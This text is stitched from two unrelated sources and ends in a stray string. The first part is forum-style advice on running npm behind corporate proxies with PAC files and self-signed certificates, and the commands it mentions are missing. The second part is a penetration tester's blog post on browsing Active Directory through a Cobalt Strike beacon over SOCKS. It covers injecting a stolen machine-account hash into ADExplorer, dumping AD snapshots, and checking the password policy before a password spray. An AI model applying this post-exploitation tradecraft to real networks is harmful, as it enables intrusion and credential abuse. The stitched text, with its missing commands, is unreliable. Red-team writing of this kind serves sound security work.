Look for the url of the pac file in internet explorer lan settings and download the pac file from the URL configured.The pac file is just a javascript file with a function named FindProxyForURL which returns different proxy hosts in different scenarios.
Even though you may login with your domain and username on your corporate machine, It is highly possible that the user active directory domain name is not required for the proxy, only the username and password (which may be different than your Active Directory login)
I also had to URL encode my domain\user string, however, I have a space inside my username so I put a + to encode the space URL encoding, but it would get double encoded as %2B (which is the URL encoding for the plus sign, however the URL encoding for a space is %20), so I had to instead do the following:
Turns out that even with the above configurations, I still had some issues with some packages/scripts that use Request - Simplified HTTP client internally to download stuff. So, as the above readme explained, we can specify environment variables to set the proxy on the command line, and Request will honor those values.
If you want to keep SSL, and don't want to use strict-ssl=false, then you have more work to do. For me, I am behind a corporate firewall and we are using self-signed certificates, so I receive the error unable to get local issuer certificate. If you are in the same boat as me, then you will need to set the cafile= option in the npm config file. First, you need to create a PEM file which holds information about your self-signed certificates. If you do not know how to do that, here are instructions for a Windows environment without using 3rd party software:
We need to explicitly indicate which certificates should be trusted because we are using self signing certificates. For my example, I navigated to www.google.com using Chrome so I could grab the certificates.
In Chrome, go to Inspect -> Security -> View Certificate. You will see all of the certificates that allow the SSL connection. Notice how these certificates are self signed. The blurred-out part is my company, and we are not a Certified Authority. You can export the full certificate path as a P7B file, or you can export the certificates individually as CER files (base64 encoding). Exporting the full path as P7B doesn't do you much good because you will in-turn need to open this file in a certificate manager and export as individual CER files anyway. In Windows, double-clicking the P7B file will open the Certificate Manager application.
You stack the certificates in reverse order from the certificate path. So above, I would start with *.google.com then paste Websense below it, then Issuing CA 1 etc. This way the certificates are parsed from the top to the bottom searching for the appropriate Root CA. Simply including the Root CA will not work, but we also do not need to include all the certificates. From the above path, I only need to include those certificates that come before the Websense certificate (Issuing CA 1, Policy CA, Root CA).
Now, with your proxies set (http and https), and the registry set to , you should be able to install packages behind a corporate firewall with self-signed certificates without nuking the strict-ssl setting.
None of the existing answers explain how to use npm with a PAC file. Some suggest downloading the PAC file, manually inspecting it, and choosing one of the"PROXY ..." strings. But this doesn't work if the PAC file needs to choose frommultiple proxies, or if the PAC file contains complex logic to bypass proxiesfor certain URLs.
The NPM proxy setup mentioned in the accepted answer solve the problem, but as you can see in this npm issue, some dependencies uses GIT and that makes the git proxy setup needed, and can be done as follow:
Because I still have problems with setting proxy settings at work and turning them off at home, I have scripted and publish npm-corpo-proxy.sh. In every corpo the password has to be changed often and must contain special chars, which must be encoded before feeding npm config (the same for backash form domain\user).
I could not make it work with the CNTLM. I tried following all the information posted above, but the proxy still did not authorize the connection. With Fiddler, you just have to install it and check the Automatically Authenticated option. But to work, I had to remove the .npmrc file from my user folder, and set the environment variables as indicated here, with these values:
Many answers and most of them are the same. My problem was, it is working fine when I am connected to the VPN of my company or working in my office, but it fails when I am using public internet connection.
ADExplorer is a tool I have always had in my backpack. It can be useful for both offensive and defensive purposes, but in this post, I am going to focus more on its offensive use. The tool itself can be found here: -us/sysinternals/downloads/adexplorer
A typical scenario I often face on engagements is that I have compromised a server or workstation, and I am able to get my hands on the local NTLM hashes as well as the computer account NTLM hash used to authenticate itself against the Active Directory domain. One way I typically end up in this scenario is to proxychain through a beacon on a user's workstation and use a known exploit to gain administrative access.
So, how do we use the Active Directory computer account over SOCKS to look at Active Directory? Well, of course there are many tools out there such as Impacket or LDAPPER, but today I'll be covering ADExplorer.
The C2 server should now have port 4444 open and allow proxy traffic through into the network where you have the beacon. I recommend that you use iptables to only allow SSH into the C2 server (that topic is something I will not cover in this post, so I recommend Googling on how to do that). Do not allow access to port 50050 (Cobalt Strike Team Server Port) or 4444 directly from the Internet. Instead, use SSH and forward those ports. To set up a port that is forwarded to 4444 on the C2 server SSH, I simply run the following SSH command:
Once that is taken care, of you open up Proxification Rules and make sure that both Localhost and Default are set to Direct. Once that is verified, add a new proxification rule by clicking the Add button.
Next, I am going to fire up ADExplorer.exe, but since I am using a machine account hash instead of a username and password, I will need to inject the hash. However, if you know a username and password, you could simply start ADExplorer and fill out the server IP address in the connect to, user, and password fields.
ADExplorer should now launch and all I need to fill in is the IP address for the domain controller in the connect to field. Since I have injected the hash into the process, ADExplorer will use the current authentication inside the process, so you should not need to fill in user or password.
Hit OK, and if you did everything correctly, you should be able to browse Active Directory over SOCKS with ADExplorer using a machine account hash. You can verify that traffic is flowing by looking at Proxifier. If you want to use a port other than the default 389, you can specify it by adding a colon at the end. It is preferred to use LDAPS whenever you can by using 636 as the port.
Looking at Active Directory over a SOCKS proxy can sometimes be very slow, so I often take a snapshot. The snapshot basically takes a copy of everything it can read from Active Directory and stores it to a file on disk over the proxy into the local machine from which you are running ADExplorer, so take bandwidth into consideration before doing it. To do this, highlight the connection (192.168.86.22 [DC1.oddvar.moe] in my case) then click File > Create Snapshot.
Fill in a path to store the dump and press OK. This could, of course, take a while if the Active Directory database is rather big. For a company with around 30,000 users, it is not uncommon for the dump to be over 800 MB in size. Once the dump is finished, I can open up the dump offline at any time using ADExplorer without the need to connect to the environment over the proxy. Instead of filling in connection details, I simply choose 'Enter the path of a previous snapshot to load' when starting ADExplorer.
In the early stages of an engagement, I typically do not know all the subnets or geographical locations of the organization. One (1) place where this is stored (if sysadmins decided to implement it) is inside Active Directory. This is implemented so that Active Directory can set up the best possible replication topology as well as direct the authentication requests to domain controllers residing in the same site as the user or computer authenticating. To find the sites, I browse to the Configuration partition and look at the sites container as shown in the following screenshot.
By highlighting the domain, I can see interesting details about the domain such as the status of the password policy or even the ms-DS-MachineAccountQuota. This password policy can be overwritten if the customer is using fine-grained password policy, so you need to be sure of that if you are planning to start a password spray based on this policy.
By default, all authenticated accounts in Active Directory can add computers to the domain, and the ms-DS-MachineAccountQuota is the attribute that determines how many computers can be added by a given account (10 by default). This can be restricted in other places, such as a Group Policy, but it is worth checking what the value is. If it is 0, it means that normal users cannot add computers to the domain.
If you are curious about whether there are trusts in play, you can search for them by looking for objectClass attributes that are set to trustedDomain, like the screenshot below.
b37509886e